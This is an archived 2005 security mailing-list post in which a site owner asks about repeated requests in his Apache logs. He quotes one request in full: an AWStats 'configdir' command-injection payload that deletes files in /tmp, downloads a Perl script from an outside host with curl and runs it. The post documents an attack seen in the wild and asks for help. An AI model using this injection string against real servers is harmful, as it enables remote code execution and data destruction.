GET //awstats.pl? in apache logs
From: Konstantine (listclient_at_gmail.com)
Date: 10/21/05
- Previous message: George Strother: "Re: IOS Security Levels"
- Next in thread: ilaiy: "Re: GET //awstats.pl? in apache logs"
- Reply: ilaiy: "Re: GET //awstats.pl? in apache logs"
- Reply: Andreas Constantinides (MegaHz): "Re: GET //awstats.pl? in apache logs"
- Maybe reply: highwaycode_at_securityfocus.com,: "Re: GET //awstats.pl? in apache logs"
- Reply: FocusHacks: "Re: GET //awstats.pl? in apache logs"
- Reply: Can't dig that daddy: "Re: GET //awstats.pl? in apache logs"
- Reply: S.A. Birl: "Re: GET //awstats.pl? in apache logs"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 21 Oct 2005 22:33:12 +0100 To: security-basics@securityfocus.com
My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1
- Previous message: George Strother: "Re: IOS Security Levels"
- Next in thread: ilaiy: "Re: GET //awstats.pl? in apache logs"
- Reply: ilaiy: "Re: GET //awstats.pl? in apache logs"
- Reply: Andreas Constantinides (MegaHz): "Re: GET //awstats.pl? in apache logs"
- Maybe reply: highwaycode_at_securityfocus.com,: "Re: GET //awstats.pl? in apache logs"
- Reply: FocusHacks: "Re: GET //awstats.pl? in apache logs"
- Reply: Can't dig that daddy: "Re: GET //awstats.pl? in apache logs"
- Reply: S.A. Birl: "Re: GET //awstats.pl? in apache logs"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]